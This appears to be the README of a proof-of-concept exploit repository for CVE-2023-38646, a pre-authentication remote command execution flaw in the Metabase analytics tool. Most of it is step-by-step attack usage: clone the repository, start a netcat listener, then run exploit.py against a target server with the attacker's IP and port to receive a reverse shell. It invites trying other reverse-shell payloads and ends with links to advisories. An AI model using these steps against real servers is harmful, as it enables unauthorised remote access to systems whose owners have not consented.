This is a Proof of Concept (PoC) script for exploiting Metabase, an open-source business intelligence and data analytics tool. Metabase allows users to visualize and interact with their data, making it a powerful platform for data analysis.
This vulnerability, designated as CVE-2023-38646, allowed attackers to execute arbitrary commands on the server without requiring any authentication. The impact of this flaw was severe, as it granted unauthorized access to the server at the server's privilege level.
Clone this Repository
git clone https://github.com/threatHNTR/CVE-2023-38646.gitNavigate to the Repository
cd CVE-2023-38646Before running the script, set Up a Netcat Listener
nc -nlvp chosen-portRun the Script
python3 exploit.py -u http://target-metabase-server -i your-ip-address -p chosen-portExploitation: The script will attempt to send a reverse shell to the target Metabase server. If successful, you will receive a shell on your machine. Feel free to change the payload to try different reverse shells.
-
GitHub Advisory: https://github.com/advisories/GHSA-jg32-8h6w-x7vg
-
Metabase Advisory: https://www.metabase.com/blog/security-advisory
-
Metabase GitHub: https://github.com/metabase/metabase
-
Assetnote Blog - Chaining our way to Pre-Auth RCE in Metabase: https://blog.assetnote.io/2023/07/22/pre-auth-rce-metabase/